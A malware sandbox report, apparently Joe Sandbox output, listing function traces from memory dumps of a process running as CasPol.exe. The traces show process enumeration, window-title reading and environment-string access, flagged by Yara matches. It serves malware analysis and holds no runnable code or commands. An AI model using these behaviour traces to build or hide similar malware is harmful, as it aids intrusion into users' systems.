                                                                                                • Instruction ID: f27d36e20d2a67c690befc106ea5cafab99e09d075a2dfca7d32a9b7008c9529
                                                                                                • Opcode Fuzzy Hash: 1559ced9db44309d12e9096fc874ef99716f3117c459c374921cc59209bdbdc6
                                                                                                • Instruction Fuzzy Hash: 57E04F62604348BBD30037F6AC4EDAB3B7CE784617B10092AF612A01D3ED7484468B79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a796732182faefe73add1043189caf6ca4f606f7631d49291716b08cb320153
                                                                                                • Instruction ID: 7c1105064789ab48ae90d42f937b6a9cbc34ac1ed42c20d541c6d1c3f1a57216
                                                                                                • Opcode Fuzzy Hash: 2a796732182faefe73add1043189caf6ca4f606f7631d49291716b08cb320153
                                                                                                • Instruction Fuzzy Hash: 7671D371900216AFEF20CF54C884ABFBB75EF45310F14422BEA15A7281DB788C61CFA9
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                                                                  • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E799
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E7BD
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7CC
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E983
                                                                                                  • Part of subcall function 0041B392: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E5A8,00000000,?,?,004750FC), ref: 0041B3A7
                                                                                                  • Part of subcall function 0041B392: IsWow64Process.KERNEL32(00000000,?,?,?,004750FC), ref: 0041B3B2
                                                                                                  • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                                                                  • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E974
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 2180151492-0
                                                                                                • Opcode ID: e9140fa3bec0085b3baadd13edf95d6fb93f5d1ff5e26ec914dd0ea93d15fe4d
                                                                                                • Instruction ID: eccf11dc20c1a31a83cdfd33956dcb3d749eb3f266b118f2c15681f5292a9231
                                                                                                • Opcode Fuzzy Hash: e9140fa3bec0085b3baadd13edf95d6fb93f5d1ff5e26ec914dd0ea93d15fe4d
                                                                                                • Instruction Fuzzy Hash: F741CF311083455BC225FB61D891AEFB7E5AFA4304F50453EF849531E1EF389A49C65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: c6d5326bb826bef7d4312f682f8fd03de73532d4ef60da68ba97a8c78ea7af64
                                                                                                • Instruction ID: 036c3dfb054a6f01566e3cd8d28730a68c174e79056a6e67996f15c63748089b
                                                                                                • Opcode Fuzzy Hash: c6d5326bb826bef7d4312f682f8fd03de73532d4ef60da68ba97a8c78ea7af64
                                                                                                • Instruction Fuzzy Hash: F341D636A002049FEB20DF79C881A5EB7B5FF88718F1545AEE915EB351DA35EE01CB84
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E5FD,?,00000000,?,00000001,?,?,00000001,0043E5FD,?), ref: 00450130
                                                                                                • __alloca_probe_16.LIBCMT ref: 00450168
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004501B9
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00439BCF,?), ref: 004501CB
                                                                                                • __freea.LIBCMT ref: 004501D4
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: daed02162d7f278869bfaea3c7a8f88d5c2a2d3218cc1490f903801f97ac0c2c
                                                                                                • Instruction ID: d7464a72994917abc30d80f71ec8451e4cba9cf5435b4dea42e63c5c2bdc5daf
                                                                                                • Opcode Fuzzy Hash: daed02162d7f278869bfaea3c7a8f88d5c2a2d3218cc1490f903801f97ac0c2c
                                                                                                • Instruction Fuzzy Hash: 9631E132A0060AABDF249F65DC41DAF7BA5EB00311F05416AFC04E7252EB3ACD54CBA5
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E354
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E377
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E39D
                                                                                                • _free.LIBCMT ref: 0044E3B0
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E3BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 1d4758ed0160ac471983c8ffd3a0470c3cf8fd4ea00c3cafbe93e28275fbbba9
                                                                                                • Instruction ID: 5f1b7bba735f2dc00ee4e6ee14e94985e19ed078b50b1d1b699098eccd63c47a
                                                                                                • Opcode Fuzzy Hash: 1d4758ed0160ac471983c8ffd3a0470c3cf8fd4ea00c3cafbe93e28275fbbba9
                                                                                                • Instruction Fuzzy Hash: D50171726017157F73221A776C88C7B6A6DEAC2F65315012EFD05D3241DE698C0291B9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445569,00440CA8,00000000,?,?,?,?,00440E8B,00000000,0000000A,000000FF,0000000A,00000000), ref: 00447158
                                                                                                • _free.LIBCMT ref: 0044718D
                                                                                                • _free.LIBCMT ref: 004471B4
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471C1
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: c73b76ca02ce190c9082a6036dde6ca48763b4b9e088bcde2ec0a65c3a46cc10
                                                                                                • Instruction ID: 9627307c59aa3692a64de8377ee3c20019e30fe80ec8d82769d3f9bfdfbdb6fb
                                                                                                • Opcode Fuzzy Hash: c73b76ca02ce190c9082a6036dde6ca48763b4b9e088bcde2ec0a65c3a46cc10
                                                                                                • Instruction Fuzzy Hash: 3E01F97624CB102BB30267B95C85D2B2A29DBC17B6726012FF509A6392EF2C8C07515D
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B5D3
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                • String ID:
                                                                                                • API String ID: 2951400881-0
                                                                                                • Opcode ID: ef8d0d82becda269430901369212c52b3606b15fcf963f3a122b886808132bbc
                                                                                                • Instruction ID: 5d23c8c1f4703883972a4236376900cac23e2486f01e1b2fafccabe2f4d6955e
                                                                                                • Opcode Fuzzy Hash: ef8d0d82becda269430901369212c52b3606b15fcf963f3a122b886808132bbc
                                                                                                • Instruction Fuzzy Hash: D5F049712003167BD31167558C4AFABB66ECF40B9AF01002BF611E21A2EF74DDC146BD
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 493641738-0
                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044F9C5
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • _free.LIBCMT ref: 0044F9D7
                                                                                                • _free.LIBCMT ref: 0044F9E9
                                                                                                • _free.LIBCMT ref: 0044F9FB
                                                                                                • _free.LIBCMT ref: 0044FA0D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 8a0a0e5e94a0327d1776c165067cf9b9603f8d21362122b3839296c578ae3d6e
                                                                                                • Instruction ID: 2de1f51a18cc7960585f1cc37bbb46b0208bdbaa703fd0d38dd13c161260ee8b
                                                                                                • Opcode Fuzzy Hash: 8a0a0e5e94a0327d1776c165067cf9b9603f8d21362122b3839296c578ae3d6e
                                                                                                • Instruction Fuzzy Hash: B5F012725042107BA620DF59FAC6D1773E9EA457247A5482BF18DEBA51C738FCC0865C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443515
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • _free.LIBCMT ref: 00443527
                                                                                                • _free.LIBCMT ref: 0044353A
                                                                                                • _free.LIBCMT ref: 0044354B
                                                                                                • _free.LIBCMT ref: 0044355C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 5455ce8706e3ca66a7bad791c73c4693f29d9b457f563819123ce72749b06e66
                                                                                                • Instruction ID: bf08c2b723e6da78e2f9a692d3f9dcffc94df7bb1312aea5ebb3a1bf48e2a6b8
                                                                                                • Opcode Fuzzy Hash: 5455ce8706e3ca66a7bad791c73c4693f29d9b457f563819123ce72749b06e66
                                                                                                • Instruction Fuzzy Hash: 4EF0FEB08011219FD726AF69BE414063BA0F709764346113BF45E66B71E7790982EB8E
                                                                                                APIs
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0041694E
                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00416980
                                                                                                • IsWindowVisible.USER32(?), ref: 00416987
                                                                                                  • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                                                                  • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                • String ID: 0VG
                                                                                                • API String ID: 3142014140-3748860515
                                                                                                • Opcode ID: f4a4863e30295bf17a6e2edc01d3da70af05de03b02ef23bbcd2352740f6b6c6
                                                                                                • Instruction ID: a92d2c2722018a5f2df8734f3a85bf91d45912e01cb50305def5a483f7f9536a
                                                                                                • Opcode Fuzzy Hash: f4a4863e30295bf17a6e2edc01d3da70af05de03b02ef23bbcd2352740f6b6c6
                                                                                                • Instruction Fuzzy Hash: FE71C3311082415AC335FB61D8A5ADFB3E4EFD4308F50493EB58A530E1EF74AA49CB9A
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                • API String ID: 2506810119-3657627342
                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442924
                                                                                                • _free.LIBCMT ref: 004429EF
                                                                                                • _free.LIBCMT ref: 004429F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                • API String ID: 2506810119-3657627342
                                                                                                • Opcode ID: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                                                                • Instruction ID: 08a660f2d8e46f51ee0862092f41265a48d7a3eaa7bec75f040af8368b354bfd
                                                                                                • Opcode Fuzzy Hash: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                                                                • Instruction Fuzzy Hash: E53193B1A00258AFEB21DF999E8199EBBBCEB85314F50406BF805A7311D6F84A41CB59
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
